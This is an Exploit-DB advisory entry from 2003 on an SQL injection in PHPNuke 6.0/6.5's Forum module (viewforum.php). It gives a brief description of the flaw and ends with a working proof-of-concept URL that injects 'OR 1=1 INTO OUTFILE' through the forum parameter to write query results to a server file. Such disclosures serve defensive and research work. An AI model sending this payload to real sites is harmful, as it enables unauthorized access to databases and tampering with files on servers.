PHPNuke 6.0/6.5 Forum Module Viewforum.PHP SQL Injection Vulnerability

2003-03-25T00:00:00
ID EDB-ID:22424
Type exploitdb
Reporter frog
Modified 2003-03-25T00:00:00

Description

PHPNuke 6.0/6.5 Forum Module Viewforum.PHP SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/7194/info

It has been reported that an input validation error exists in the 'viewforum.php' script included with PHPNuke as part of the Forum module. Because of this, an attacker could send a malicious string through PHPNuke that would allow the attacker to inject SQL commands and queries into the SQL database used by PHPNuke.

http://www.example.com/modules.php?op=modload&name=Forums&file=viewforum&forum='%20OR%201=1%20INTO%20OUTFILE%20'[/path]/vf.txt'/*